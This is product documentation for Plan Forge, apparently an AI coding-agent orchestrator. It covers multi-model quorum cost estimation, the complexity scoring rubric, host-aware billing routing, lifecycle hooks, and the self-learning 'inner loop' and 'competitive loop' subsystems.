Cost estimates come from tools, not chat math. When deciding which quorum mode to run, or showing the user dollar amounts in any picker, call forge_estimate_quorum first. Hand-computed quorum estimates have been observed to overshoot reality by an order of magnitude (Phase-COST-TOKEN-COVERAGE field reports). The agent guidance shipped in .github/copilot-instructions.md requires this for any quorum picker UI.

forge_estimate_quorum projects the cost of a plan under all four quorum modes in one round-trip, no need to call --estimate four separate times. It returns per-mode totals plus a per-slice breakdown showing which slices cleared the threshold.

forge_estimate_quorum flow: tool call with planPath, parsePlan + scoreSliceComplexity, four parallel mode estimations (false/auto/power/speed), comparison JSON output with per-mode totals and per-slice breakdown — Figure 14-3. forge_estimate_quorum flow

Calling the tool

MCP / Copilot Chat

// Direct MCP call
forge_estimate_quorum({
  planPath: "docs/plans/Phase-7.md",
  resumeFrom: 1   // optional, only estimate slices ≥ N
})

// CLI equivalent (runs all four modes under the hood)
pforge run-plan docs/plans/Phase-7.md --estimate --quorum-compare

Response shape

Response (abbreviated)

{
  "false":  { "totalCostUSD": 0.28, "baseCostUSD": 0.28, "overheadUSD": 0,
              "quorumSliceCount": 0, "totalSliceCount": 7, "confidence": "historical" },
  "auto":   { "totalCostUSD": 0.42, "baseCostUSD": 0.28, "overheadUSD": 0.14,
              "quorumSliceCount": 1, "totalSliceCount": 7, "confidence": "historical" },
  "power":  { "totalCostUSD": 12.50, "baseCostUSD": 0.42, "overheadUSD": 12.08,
              "quorumSliceCount": 3, "totalSliceCount": 7, "confidence": "historical" },
  "speed":  { "totalCostUSD": 1.20, "baseCostUSD": 0.31, "overheadUSD": 0.89,
              "quorumSliceCount": 1, "totalSliceCount": 7, "confidence": "historical" },
  "slices": [
    { "sliceNumber": 1, "complexityScore": 3, "projectedCostUSD": 0.04, "quorumEligible": false },
    { "sliceNumber": 2, "complexityScore": 6, "projectedCostUSD": 4.18, "quorumEligible": true  },
    { "sliceNumber": 3, "complexityScore": 7, "projectedCostUSD": 4.22, "quorumEligible": true  },
    ...
  ]
}

Field	Meaning
`baseCostUSD`	What the plan costs without quorum overhead, single-model run for every slice
`overheadUSD`	Δ added by the extra quorum legs + reviewer synthesis. `baseCostUSD + overheadUSD = totalCostUSD`.
`quorumSliceCount`	How many slices cleared the mode's threshold and will fan out to multiple models
`confidence`	`"historical"` when calibrated against ≥ 3 prior runs, `"heuristic"` for cold-start projects
`slices[].complexityScore`	The 1–10 score from scoreSliceComplexity()
`slices[].quorumEligible`	Whether this slice cleared the threshold for the requested mode

Worked cost example: 7-slice fixture plan

The numbers above come from the heuristic fixture used in capabilities.mjs, illustrative, not measured. For a typical mid-size plan (10–15 slices, 1–3 quorum-eligible), real-world numbers from the Plan Forge dogfood corpus look like:

Mode	Total cost	Multiplier vs baseline	Slices fanned out	Use when
`false` (off)	~$0.30 – $2.00	1.0×	0 / 12	Mechanical work, conversions, doc edits
`--quorum=auto`	~$0.40 – $3.50	1.2 – 1.8×	1–2 / 12	Default for normal feature work
`--quorum=speed`	~$1.00 – $4.00	1.5 – 2.5×	1 / 12 (threshold 7)	Tight budget, want consensus only on the genuinely hard slices
`--quorum=power`	~$10 – $25	10 – 30×	2–4 / 12 (threshold 5)	Architectural slices, security-critical paths, irreversible migrations
`--quorum` (force-all)	~$30 – $80	30 – 100×	12 / 12	Almost never. Use `auto` + selective `--quorum-threshold` instead.

Numbers are order-of-magnitude, actual cost depends on slice scope size, host (subscription-covered vs pay-per-token), and the cost-calibration ratio in .forge/cost-history.json. Always estimate before running.

Single-slice variant: forge_estimate_slice (companion tool) returns cost for one slice with rationale strings like "threshold 5 met: complexity 6" or "mode false: quorum disabled". Useful when you want to ask “is this specific slice worth quorum?” without re-estimating the whole plan.

Complexity Scoring Rubric — How a Slice Earns Its Score v2.83+

What makes a slice "complex enough to need quorum"? The orchestrator's scoreSliceComplexity() function (see orchestrator.mjs) reads seven weighted signals from the parsed slice and produces an integer 1–10. Modes then compare that score against their threshold to decide whether to fan out.

Quorum complexity scoring rubric: seven signals (scope files, dependencies, security keywords, database keywords, gate lines, task count, historical failure rate) with their weights, fed through scoreSliceComplexity to produce a 1-10 score, then routed by threshold gate (power=5, auto=6, speed=7) to either fan-out or single-model run — Figure 14-4. Quorum complexity scoring rubric

The seven signals

Signal	Weight	Source	What it captures
Scope breadth	0.20	`slice.scope[].length / 5`	How many files this slice touches. Wide scope ⇒ more places to make a mistake.
Dependencies	0.20	`slice.depends[].length / 4`	How many earlier slices this one builds on. Deep dependencies ⇒ harder reasoning chain.
Security keywords	0.15	Hits in title + tasks + gate	Matches against `auth, crypto, secret, token, password, jwt, oauth, …`. Security mistakes are expensive to roll back.
Database keywords	0.15	Hits in title + tasks + gate	Matches against `migration, schema, sql, index, constraint, foreign key, …`. Schema changes are often irreversible.
Gate complexity	0.10	Non-blank lines in `validationGate`	A long validation gate is a proxy for "this slice has a lot of correctness conditions to satisfy."
Task count	0.10	`slice.tasks[].length / 10`	Many small tasks ⇒ more chances for a single model to lose track.
Historical failure rate	0.10	`.forge/runs/index.jsonl` (last 20)	If past slices with similar title words have failed often, this one gets nudged up. Self-tuning over time.

The raw weighted sum (0–1) is mapped to the final integer via clamp(1, 10, round(raw × 9) + 1).

Threshold mapping

Mode	Threshold	What clears it (typical)
`--quorum=power`	5	Slices touching 3+ files or with deep deps or mentioning auth/schema
`--quorum=auto`	6 (CLI default)	The above plus a substantial gate or 6+ tasks
`--quorum=speed`	7	Only the genuinely hard slices, wide scope and security/db keywords and failure history
Custom	`--quorum-threshold N`	Override per run; `1` = quorum everything, `10` = quorum almost nothing

Real-plan calibration: across the Plan Forge dogfood corpus, observed maximum scores land between 4 and 6, most slices score 2–4. That means threshold 5 is the sweet spot for power mode (catches the architectural slices), threshold 6 is conservative for auto (catches roughly 10–25% of slices in a typical phase), and threshold 7 fires on <5% of slices. The Adaptive Quorum Threshold system in .forge/quorum-history.json auto-tunes these from your project's run history.

Worked example

Consider a slice titled "Add JWT refresh-token rotation with Redis backing" with 4 scope files, depends on slices 2 and 5, 7 tasks, a 12-line validation gate, and 1 prior failure in 8 historical matches:

scoreSliceComplexity walkthrough

scope    = min(4/5, 1.0)   × 0.20 = 0.16
depends  = min(2/4, 1.0)   × 0.20 = 0.10
security = min(2/3, 1.0)   × 0.15 = 0.10   // "jwt", "token"
database = min(0/3, 1.0)   × 0.15 = 0.00
gate     = min(12/5, 1.0)  × 0.10 = 0.10
tasks    = min(7/10, 1.0)  × 0.10 = 0.07
history  = (1/8)           × 0.10 = 0.0125
                                    ──────
raw                              = 0.5425
score = clamp(1, 10, round(0.5425 × 9) + 1) = 6

→ clears threshold for: power (≥5), auto (≥6)
→ does NOT clear:        speed (≥7)

Multi-Agent Quorum Turns — `PFORGE_QUORUM_TURN` v2.78+

When quorum runs in multi-agent mode (Claude → Codex → Cursor handoffs), the orchestrator sets the PFORGE_QUORUM_TURN environment variable for the duration of each quorum-leg invocation. This is a coordination signal, not user-facing config, but it shows up in logs and matters when debugging hook behavior.

What the variable controls

Hook / system	Behavior when `PFORGE_QUORUM_TURN` is set
`PreAgentHandoff` hook	Skipped. Returns `{ triggered: false, skippedReason: "PFORGE_QUORUM_TURN active" }` and logs `[PreAgentHandoff] skipping context injection, PFORGE_QUORUM_TURN active`. See `orchestrator.mjs` ~L7585.
OpenClaw snapshot post	Skipped. No drift / MTTR / incident snapshot is sent between quorum legs.
Cost telemetry	Per-leg cost is tagged `quorumTurn: true` in `slice-N.json` so the Cost Report can roll up the legs into a single quorum line item.
Tracing	Each leg gets its own trace span but with a shared `quorumGroupId` so dashboards can collapse them.

Why skip context injection?

Quorum exists to get independent analyses from each model. If PreAgentHandoff injected the same drift / MTTR / open-incident context into every leg, the models would converge, defeating the whole point. The reviewer (the synthesizing model) does get the full handoff context when it merges the proposals, because that's where the project-wide state actually matters.

Don't set this variable manually. It's owned by the orchestrator and the multi-agent dispatch layer. Setting it yourself in a shell will cause the next PreAgentHandoff to silently skip, which can mask drift alerts. If you see "PFORGE_QUORUM_TURN active" in logs outside a quorum run, something has leaked the variable; clear it with Remove-Item Env:PFORGE_QUORUM_TURN (PowerShell) or unset PFORGE_QUORUM_TURN (bash).

📄 Cross-references: Chapter 13 — Multi-Agent for the handoff model · Chapter 20 — Remote Bridge for the OpenClaw snapshot path · Forge-Master Quorum Advisory for the per-prompt counterpart.

Quorum Quality Examples — What 3 Models Catch That 1 Doesn't

The argument for quorum mode is mostly abstract, "synthesis effect," "independent analyses," "reviewer picks the cleaner approach." A single side-by-side run of the same task makes the argument concrete. The numbers below come from a controlled A/B run on a real C# invoicing slice: same plan, same gates, same acceptance criteria; one execution with the default single-model worker, one with three-model quorum. Both passed all gates and the independent reviewer. The difference is in how they passed.

Metric	Single (control)	Quorum (3-model)
Tests written	15	18 (+20%)
Helper extraction	Inline code, repeated 3×	Extracted helpers, single source
Test dates	Hardcoded literals	Relative offsets
.NET pattern	Generic `ValidationException`	`ArgumentException.ThrowIfNullOrWhiteSpace`
Edge cases	Standard happy path	Voided invoice regen, sequence races
Total cost	$0.62	$0.84 (+35%)

$0.22 of additional spend, both pass review, and the quorum run is measurably more maintainable. Four named patterns drive the difference.

Pattern 1 — DRY helper extraction

The single-model run inlined volume-discount math in three call sites with slight variations. The quorum run extracted reusable helpers because the synthesizer saw multiple proposals and picked the one that didn't repeat itself.

Representative example. The quorum run produced IsWeekend(), CalculateVolumeDiscount(), and ApplyBankersRounding() as private static helpers, called from each invoicing entry point. The single-model run inlined the equivalent ternary expressions at every call site. Same behavior; different debuggability when the discount tier changes a year from now.

// Single model, inlined at three call sites
var discount = quantity >= 100 ? 0.15m : quantity >= 50 ? 0.10m : quantity >= 10 ? 0.05m : 0m;

// Quorum, extracted helper
private static decimal CalculateVolumeDiscount(int quantity) => quantity switch
{
    >= 100 => 0.15m,
    >= 50  => 0.10m,
    >= 10  => 0.05m,
    _      => 0m,
};

Pattern 2 — Robust test dates

Single-model tests pinned dates to literal calendar days. Those tests will fail when those dates pass and the business logic correctly refuses future invoices. Quorum tests used relative offsets that stay green forever.

Representative example. The control run wrote new DateTime(2026, 3, 15) in test fixtures. The quorum run wrote DateTime.Now.AddDays(-7). Identical intent; only one survives March 16th.

// Single model, breaks on April 16th
var invoice = new Invoice { Date = new DateTime(2026, 3, 15) };

// Quorum, stays green forever
var invoice = new Invoice { Date = DateTime.Now.AddDays(-7) };

Pattern 3 — Modern .NET patterns

Validation guard clauses are a tell. The control run used the generic exception path; the quorum run reached for the modern static-helper API that ships better error messages and is the current recommended pattern.

Representative example. The control run used throw new ValidationException("Customer name is required"). The quorum run used ArgumentException.ThrowIfNullOrWhiteSpace(customerName). The quorum reviewer chose the .NET 7+ helper because one of the three workers proposed it; the synthesizer recognized it as the modern equivalent.

// Single model, generic, manual message
if (string.IsNullOrWhiteSpace(customerName))
    throw new ValidationException("Customer name is required");

// Quorum, modern .NET 7+ helper, auto-generated message including parameter name
ArgumentException.ThrowIfNullOrWhiteSpace(customerName);

Pattern 4 — Edge-case coverage the control missed entirely

The +3 tests in the quorum run weren't padding. They were edge cases the single model never wrote because no one model considered both the happy path and the failure mode at the same time. With three independent analyses, edge cases that one model thinks of get surfaced into the synthesis.

Representative example. The quorum run added a test for "regenerating an invoice after the original was voided" (VoidedInvoice_Regenerate_AssignsNewSequenceNumber) and a test for "concurrent invoice number assignment under two simultaneous requests" (ConcurrentInvoiceCreation_DoesNotReuseSequenceNumbers). Neither appeared in the control run. Both are exactly the kind of test that catches a production bug six weeks after launch.

The synthesis mechanism

The pattern across all four examples is the same: one model proposes one thing, another model proposes a cleaner version, the reviewer picks the cleaner one. Inline code vs extracted helper, extraction wins. Hardcoded date vs relative offset, relative offset wins. Generic exception vs modern helper, modern helper wins. Standard tests vs edge-case tests, edge-case tests win. The quorum doesn't make any individual model smarter; it makes the worst-case output of each model less likely to be what ships.

When this pays off

Slice type	Quorum worth it?	Why
Auth / billing / payments	Yes	Edge cases here are production bugs that cost money; +35% cost is cheap insurance
Database migrations	Yes	Wrong migration is irreversible; multi-model agreement is a meaningful signal
Architectural slices (new layer, new pattern)	Yes	The synthesis effect produces noticeably cleaner abstractions
Bug fix with tight reproducer	Maybe	If the fix is one line and the test is obvious, single model is fine
CRUD endpoint, well-trodden pattern	Probably not	All three models will produce nearly identical code; +35% cost buys nothing new
Pure docs slice	No	Synthesis effect doesn't apply to prose; pick the cheapest model that writes well

--quorum=auto applies this judgment per slice using the complexity scoring rubric. Manual --quorum=power and --quorum=speed let you force the call when you already know which slices are which. The discovery harness uses single-model dispatch by default because audit findings are mechanical; the auto-smelt loop is the place to catch defects, not the discovery pass.

📄 Source: Quorum Mode — What 3 Models Catch That 1 Doesn't on the Plan Forge blog (the controlled A/B run that produced this comparison).

Host-Aware Routing v2.82+

Plan Forge runs in different IDEs and CLI hosts (VS Code + Copilot, Claude Code, Cursor, Windsurf, Zed, the bare CLI). Each host has its own billing surface. The host-aware routing preference (added v2.82, fixes #104) ensures users on non-Copilot hosts don't silently double-pay against subscriptions they're already paying for.

Host-aware routing decision tree: detectClientHost identifies the IDE/CLI host, .forge.json#routing.hostPreference is loaded (default auto), getRoutingPreference picks one of four surfaces. Auto+Copilot host -> gh-copilot first (subscription). Auto+non-Copilot -> direct API first (honor user's subscription). gh-copilot mode -> always Copilot. direct-api mode -> always direct. drop mode -> refuse gpt-* on non-Copilot host without OPENAI_API_KEY.

The four modes

Mode	Behavior	When to use
`auto` (default)	Claude Code / Cursor / Windsurf / Zed prefer direct API first; VS Code + Copilot / CLI keep `gh-copilot` first	Recommended. Honors whatever subscription the user is paying for.
`gh-copilot`	Always prefer `gh copilot` regardless of host	You want all spend to land on your Copilot subscription
`direct-api`	Always prefer direct HTTP APIs regardless of host	You're scripting with explicit per-call cost tracking
`drop`	Refuses `gpt-*` on non-Copilot hosts unless `OPENAI_API_KEY` is set. Strongest "honor the vendor" stance.	You want to fail loudly rather than spend silently

Configuration

{
  "routing": {
    "hostPreference": "auto"   // "auto" \| "gh-copilot" \| "direct-api" \| "drop"
  }
}

Pre-run summary table

Before any model fires in quorum mode, the orchestrator emits a per-model billing surface table to stdout:

Quorum Pre-Run Summary (host: claude-code, preference: auto)
  ✓ claude-opus-4.7   → anthropic-direct      ($0.0061/req)
  ✓ gpt-5.3-codex     → openai-direct         ($0.0048/req)
  ⚠ grok-4.20         → xai-direct            ($0.0033/req)  needs XAI_API_KEY
  ✓ claude-sonnet-4.6 → anthropic-direct      ($0.0019/req)

Per-slice telemetry now records host, billingSurface, and billingWarning in slice-N.json so cost aggregation can distinguish subscription-covered vs pay-per-token spend in the Cost Report.

Cost Optimization

The orchestrator tracks model performance in .forge/model-performance.json, success rate, average cost, and duration per model. It auto-selects the cheapest model with >80% historical pass rate.

Forge Intelligence, Three self-tuning systems reduce cost over time:

Cost Calibration, Estimates auto-correct using a historical estimate-vs-actual ratio (clamped 0.5×–3×). After 3+ runs, --estimate accuracy improves automatically.
Adaptive Quorum Threshold, Reads .forge/quorum-history.json to learn which slices actually need quorum. If <20% needed it, threshold rises (fewer quorum runs = lower cost). If >60% needed it, threshold drops.
Slice Auto-Split Advisory, --estimate flags slices with 2+ prior failures or >6 tasks as candidates for splitting. Smaller slices cost less and succeed more often.

Preview costs: pforge run-plan --estimate docs/plans/Phase-7.md
Review spend: pforge cost or Dashboard Cost tab
Agent-per-slice routing: Override model per slice with --model flag
Reduce context: Use targeted Context: lists per slice (see Chapter 4)

API Key Configuration

API keys for external providers (xAI Grok, OpenAI) are resolved in order: environment variable → .forge/secrets.json → null.

For local development, store keys in the gitignored .forge/secrets.json:

.forge/secrets.json

{
  "XAI_API_KEY": "xai-...",
  "OPENAI_API_KEY": "sk-..."
}

The .forge/ directory is in .gitignore by default, secrets are never committed.

CI Integration

Add Plan Forge validation to your GitHub Actions PR workflow:

.github/workflows/plan-forge-validate.yml

- uses: srnichols/plan-forge-validate@v1
  with:
    analyze: true          # Run consistency scoring
    sweep: true            # Check for TODO/FIXME markers
    threshold: 60          # Minimum analyze score to pass

PRs that fail the threshold are blocked from merging. The action validates file counts, checks for unresolved placeholders, and runs pforge analyze.

Cloud Agent Execution

GitHub's Copilot cloud agent works on issues autonomously. Plan Forge integrates via .github/copilot-setup-steps.yml, which provisions the agent with Node.js, guardrails, MCP tools, and smith verification before it starts coding.

Parallel Execution

The orchestrator builds a DAG from [P] tags and [depends: Slice N] declarations. Independent slices run concurrently when workers are available. Merge checkpoints validate that all parallel branches resolved cleanly.

Conflict detection: If two parallel slices modify overlapping [scope:] paths, the orchestrator flags the conflict before execution starts.

Resume and Retry

Terminal

# Resume from slice 3 after fixing a failure
pforge run-plan docs/plans/Phase-7.md --resume-from 3

# Dry run, parse and validate without executing
pforge run-plan docs/plans/Phase-7.md --dry-run

When a gate fails, fix the issue manually, then resume. Completed slices are skipped, only remaining slices execute.

OpenBrain Memory

The OpenBrain integration bridges the 4-session pipeline with long-term, cross-session context. Prior decisions, patterns, and postmortems are automatically searched and injected at the start of each session. After every run, lessons are captured for future phases.

As of v3.6, OpenBrain is the documented L3 memory layer, still optional, but loud and easy to enable. Check status with pforge brain status; see install options with pforge brain hint. Plan Forge works without it; the inner loop (Reflexion, Auto-skills, Federation) only improves over time with it. See Project History → v3.6.

Install via extension: pforge ext add plan-forge-memory

LiveGuard Lifecycle Hooks

Three hooks fire automatically during agent sessions to enforce operational safety:

Hook	Trigger	Behavior	Blocking
PreDeploy	Before deploy-related file writes or commands	Runs `forge_secret_scan` + `forge_env_diff`, blocks on findings	Yes
PostSlice	After every slice commit	Runs `forge_drift_report`, warns on drift regression	No (advisory)
PreAgentHandoff	At session start when resuming work	Injects LiveGuard context into agent prompt	No

Configure in .forge.json:

.forge.json

{
  "hooks": {
    "preDeploy": { "blockOnSecrets": true, "warnOnEnvGaps": true, "scanSince": "HEAD~1" },
    "postSlice": { "silentDeltaThreshold": 5, "warnDeltaThreshold": 10, "scoreFloor": 70 },
    "preAgentHandoff": { "injectContext": true, "cacheMaxAgeMinutes": 30, "minAlertSeverity": "medium" }
  }
}

See Chapter 16 — What Is LiveGuard? for the full operational intelligence overview.

📄 Full reference: capabilities, CLI Reference — run-plan

Circular feedback flow with amber arrows curving between hammer, mirror, scroll, and brain totems converging on a central glowing core, the self-deterministic agent loop

Deep Dive · Act II, Forge · Master Narrative

The Self-Deterministic Agent Loop

The canonical overview. How Plan Forge's deterministic slice executor, the Phase-25 reflective layer, and the Phase-26 competitive layer compose into a single self-deterministic agent loop.

New here? Plain-English version. “Self-deterministic” is a mouthful. Here's what it really means: Plan Forge runs the same way every time (same plan + same config = same outcome, no surprises), but it also learns from every run and uses that knowledge to make the next run smarter. The execution stays predictable; the context gets richer.

Deterministic part, the slice executor. No random model picking, no hidden retries that change the result. You can re-run a plan and get the same answer.
Self-learning part, the “inner loop” (reflection on what worked) and “competitive loop” (multiple models racing) feed lessons back into the next slice or plan.
Safety, every learning signal is opt-in or advisory. Nothing silently changes a run you've already started.

This chapter is the master narrative tying it all together. If you want the focused deep dives, jump to Inner Loop (reflection) or Competitive Loop (racing).

Canonical reference. Start here if you want the whole picture. The companion chapters, The Inner Loop (Phase-25 reflective layer) and The Competitive Loop (Phase-26 worktree race, auto-fix, cost anomalies), drill into the individual subsystems.

What "self-deterministic" means

Plan Forge's slice executor is deterministic: same plan, same config, same model routing, same outcome. On top of that spine, the Phase-25 and Phase-26 subsystems let the loop observe itself and feed what it learns back into the next slice, the next plan, or a sibling project. The execution contract stays deterministic; the loop's context gets progressively better-informed. That combination is what we mean by self-deterministic:

Determinism at the execution boundary, no randomized control flow, no hidden model selection.
Reflective feedback at the learning boundary, trajectories, postmortems, auto-skills, and advisory signals.
Every signal is opt-in or advisory by default; nothing silently changes a deterministic plan run.

Diagram A — System-wide state flow

The outer pipeline is the same one Plan Forge has always had. The inner loop adds callback arrows that let later stages feed earlier stages without breaking the forward progression.

System-wide state flow, the deterministic outer pipeline with callback arrows that let later stages feed earlier stages.

Two things to notice: first, every backward arrow from Execute, Sweep, and Review is opt-in or advisory by default, the forward pipeline stays honest. Second, the arrow from Execute back to Harden crosses a plan boundary: a postmortem written at the end of this run is read by the hardener at the start of the next one.

Diagram B — Inner-loop callback graph

Zooming into a single slice, here is what happens at the slice boundary and how each Phase-25 and Phase-26 subsystem feeds something downstream, the next slice, the next plan's hardener, or a Dashboard promotion surface.

Inner-loop callback graph, slice-boundary signals (L2, L4, L5, L6, L8, C1, C2, C3) feeding the next slice, the next hardener, and Dashboard surfaces.

The Phase-25 subsystems are labeled L1–L8 in the capabilities surface (forge_capabilities → innerLoop); the Phase-26 subsystems, C1 competitive, C2 auto-fix, C3 cost-anomaly, extend the same surface. Every node in the diagram corresponds to one entry in INNER_LOOP_SURFACE.subsystems.

Subsystem roll-call

Every subsystem, the stage at which it fires, and where its output shows up. See the companion chapters for mechanics and configuration.

Subsystem	Fires at	Output lands in	Default posture
Reflexion (L7)	Gate fail → retry	Next attempt's prompt	Always on
Trajectory (L8)	Slice pass	`.forge/trajectories/`	Always on
Auto-skill library (L2)	Slice pass → next slice	`.forge/auto-skills/`	Always on
Adaptive gate synthesis (L6)	Pre-flight	Stdout + Dashboard promotion surface	Suggest (never mutates plans)
Postmortem (L5)	Run end	`.forge/plans/<basename>/postmortem-*.json`	Always on (retention 10)
Federation (L4-lite)	Brain miss → cross-repo read	In-memory recall	Off (opt-in, absolute local paths)
Reviewer (L4)	Gate-check	Gate-check response, Dashboard	Off, advisory-only
Competitive (C1)	Slice start (marked competitive)	Winner's worktree → tree	Off (opt-in)
Auto-fix (C2)	Gate fail + small diff	`.forge/proposed-fixes/`	Advisory (never auto-apply)
Cost-anomaly (C3)	Every slice	`.forge/cost-anomalies.jsonl`, Dashboard	Advisory (detection only)

Why this matters

The individual subsystems are useful on their own. The mesh is what turns a slice runner into a self-deterministic loop: a trajectory written today becomes part of tomorrow's planning context; a cost anomaly noticed this run becomes the reason next run's hardener picks a cheaper model for that slice; a gate command accepted three times graduates into the validation template for that domain. None of this changes the deterministic execution contract, it only changes the information the deterministic executor runs with.

Companion chapters. The Inner Loop covers L1–L8 (Phase-25) mechanics and configuration. The Competitive Loop covers C1–C3 (Phase-26). Dashboard → Inner Loop tab shows live state for all ten subsystems.

Polished bronze hand-mirror reflecting a glowing amber spiral of feedback loops curving inward to a glowing core, the inner reflection loop

Deep Dive · Act II, Forge

The Inner Loop

Seven subsystems, reflexion, trajectories, auto-skills, gate synthesis, postmortems, federation, and the opt-in reviewer, that turn every slice into a research step.

New here? Decode the seven words first. The subtitle drops a lot of jargon. Here's a one-line plain-English read on each:

Reflexion, when a slice fails, the model gets to re-read its own previous attempt before retrying. (Like reviewing your own essay before rewriting it.)
Trajectories, short notes the model leaves for itself about what worked and what didn't. Saved per slice.
Auto-skills, if a pattern keeps showing up across slices, Plan Forge auto-generates a reusable skill so the next slice starts from a higher baseline.
Gate synthesis, advisory suggestions for stricter validation gates based on what's been failing.
Postmortems, a one-paragraph summary written after every run: what retried, what cost more, what drifted.
Federation, optionally publish those postmortems to a shared store so sibling projects benefit from each other's lessons.
Opt-in reviewer, a second AI checks the slice before it commits. You decide whether to enable it.

All seven default to off, advisory, or read-only. Existing workflows don't change unless you opt in.

Opt-in by default. All seven subsystems default to off / suggest / read-only for existing projects. New installs get best-defaults. Toggle everything from the Dashboard → Config tab. Nothing in your current workflow breaks.

For the canonical system-wide overview covering Phase-25 and Phase-26 together, see The Self-Deterministic Agent Loop.

The Inner Loop — State Flow

The deterministic slice executor (Phase-1 through Phase-24) is the spine. The Phase-25 subsystems bolt on reflective behavior at specific transitions, they never replace the spine, they only enrich it.

The Seven Subsystems

Each subsystem has a single job, a single config key (if any), and a single storage artifact. Add them up and you get a closed research loop where every run teaches the next.

1. Reflexion (L7) — the retry gets context

When a slice's validation gate fails, the orchestrator builds a compact Markdown block with the gate command, model, duration, and the stderr tail (≤2KB). That block is injected into the next attempt's prompt so the worker reasons about its prior failure instead of blindly trying the same thing.

Module: pforge-mcp/memory.mjs → buildReflexionBlock()
Config: none, always on
Storage: in-memory per attempt

2. Trajectories (L8) — what actually happened

On slice pass, Plan Forge extracts the sentinel-wrapped note the worker produced (…), word-caps it at 500, and writes it to disk. Postmortems and federation consumers read these for compact run narratives.

Module: pforge-mcp/memory.mjs → writeTrajectory()
Config: none, always on
Storage: .forge/trajectories/<slice>/<iso>.md

3. Auto-skills (L2) — patterns that earn promotion

A slice that passes gets captured as a candidate auto-skill with its domain keywords, gate commands, and a SHA prefix. Before the next slice, the orchestrator retrieves matching skills (ranked by reuse count) and injects them into the prompt. A skill promotes to "stable" once its reuse count hits the threshold (default 3).

Module: pforge-mcp/memory.mjs → retrieveAutoSkills() / writeAutoSkill()
Config: none — defaults are Dashboard-editable in Phase-26
Storage: .forge/auto-skills/*.md

4. Adaptive gate synthesis (L6) — Tempering advises your plans

During plan pre-flight the orchestrator scans every slice. If a slice's title or file list matches a Tempering domain profile (domain / integration / controller) but declares no validation gate, it prints a suggested command using the project's Tempering coverage minimum and runtime budget. Default mode is suggest; set mode: "off" to silence it.

Module: pforge-mcp/orchestrator.mjs → synthesizeGateSuggestions()
Config: runtime.gateSynthesis: { mode, domains }
Storage: stdout only (never mutates your plan)

5. Plan postmortems (L5) — the hardener learns from you

After every run, pass or fail, Plan Forge writes a JSON postmortem with retriesPerSlice, gateFlaps, topFailureReason, costDelta, and driftDelta (deltas vs the prior run). Retention is 10 per plan. The Step-2 hardener now reads the newest 3 postmortems and folds their signals into the Scope Contract, closing the loop from execution back into planning.

Module: pforge-mcp/orchestrator.mjs → buildPlanPostmortem() / writePlanPostmortem()
Config: retention count via maxRunHistory-style defaults
Storage: .forge/plans/<plan-basename>/postmortem-*.json

6. Cross-project federation (L4-lite) — one project's memory helps another

Opt-in. When a cross.* brain recall misses L3 (OpenBrain), the facade fans out to the repos listed in brain.federation.repos[] and reads their .forge/brain/<entity>/<id>.json, read-only, absolute local paths only. URLs and relative paths are rejected by contract.

Module: pforge-mcp/brain.mjs → federationRead()
Config: brain.federation: { enabled, repos: [] }, defaults off
Security: absolute-local-paths-only (D9); .. rejected; defense-in-depth path containment check

7. Reviewer-agent in-loop (L4) — cheap second pair of eyes

Opt-in. When enabled, the brain.gate-check responder invokes a speed-quorum reviewer on each slice's diff summary and attaches a verdict to the response (score, critical, summary, durationMs). Advisory-only by default: critical verdicts do not block the next slice unless operators explicitly set blockOnCritical: true. Blocking mode enters Phase-26 after calibration data exists.

Module: pforge-mcp/brain.mjs → invokeReviewer()
Config: runtime.reviewer: { enabled, quorumPreset, blockOnCritical, timeoutMs }
Defaults: enabled=false, quorumPreset="speed" (D5), blockOnCritical=false (D6), timeoutMs=30000

Configuration Summary

Everything the Inner Loop exposes lives under two keys in .forge.json, and every key has a toggle in the Dashboard → Config tab.

{
  "runtime": {
    "gateSynthesis": { "mode": "suggest", "domains": ["domain", "integration", "controller"] },
    "reviewer":      { "enabled": false, "quorumPreset": "speed", "blockOnCritical": false, "timeoutMs": 30000 }
  },
  "brain": {
    "federation":    { "enabled": false, "repos": [] }
  }
}

Phase-26 additions (v2.58.0)

Three more subsystems close the loop further, the slice executor can now race strategies, draft its own patches when a gate fails, and flag token-cost drift without halting a run.

Competitive execution (L9), Opt-in worktree race. Two or more strategies run the same slice under isolated git worktrees; the winner is elected by gate result, reviewer verdict, and token-cost tie-breaker. Off by default. Config: innerLoop.competitive. See The Competitive Loop for the full flow.
Auto-fix patch proposals (L6), When a gate-fail trajectory suggests a small local correction, the orchestrator drafts a .patch file under .forge/proposed-fixes/. Advisory, nothing auto-applies unless applyWithoutReview: true.
Cost-anomaly detection (L5), Slices whose token cost drifts above the per-model median by more than ratio (default 2.0) are recorded in .forge/cost-anomalies.jsonl. Detection only; never halts a run.

Additional config block (added by the v2.58 best-defaults preset for new installs; existing projects opt in):

{
  "innerLoop": {
    "competitive": { "enabled": false, "maxParallel": 2, "timeoutSec": 1800 },
    "autoFix":     { "enabled": true, "applyWithoutReview": false },
    "costAnomaly": { "enabled": true, "ratio": 2.0, "medianWindow": 20 }
  }
}

All three are surfaced in the Dashboard's new Inner Loop tab alongside the Phase-25 subsystems.

See also: Chapter 2 — How It Works describes the Forge spine; this page describes the reflective layers the Inner Loop adds on top. The Competitive Loop covers the worktree-race mechanics in depth.

Three blacksmith-spirits (green, blue, gold) racing on parallel forge tracks toward a finish-line beam, worktree races and winner election

Deep Dive · Act II, Forge

The Competitive Loop

Opt-in worktree races, winner election, auto-fix proposals, and cost-anomaly detection — three opt-in inner-loop subsystems.

New here? Decode the jargon first. This chapter introduces three new tricks; here's what they actually do:

Worktree race, a worktree is a sandbox copy of your repo. Instead of one model trying a slice, Plan Forge can spawn 2–3 sandboxes in parallel, let different models compete, and pick whichever produces the best result. (A “winner election” is just “score them and choose one.”)
Auto-fix proposals, when a slice fails, the loop drafts a patch file in .forge/proposed-fixes/ for you to review. It never applies the fix automatically.
Cost-anomaly detection, watches token spend per slice. If today's run costs 3× yesterday's, you get a warning. Advisory only; doesn't stop the run.

All three are off by default and only kick in when you opt in. Nothing here changes existing behavior unless you ask for it.

Opt-in, advisory by default. Every subsystem on this page is opt-in and ships in advisory posture. Competitive execution is off by default; auto-fix drafts patches but never auto-applies; cost-anomaly detection never halts a run. See also The Inner Loop for the Phase-25 subsystems this chapter builds on.

For the canonical system-wide overview covering Phase-25 and Phase-26 together, see The Self-Deterministic Agent Loop.

Worktree race → winner election

When a slice is marked for competitive execution, the orchestrator spawns a worktree per strategy, runs each in isolation, and elects a single winner. Losing worktrees are cleaned up; only the winner's changes enter the working tree.

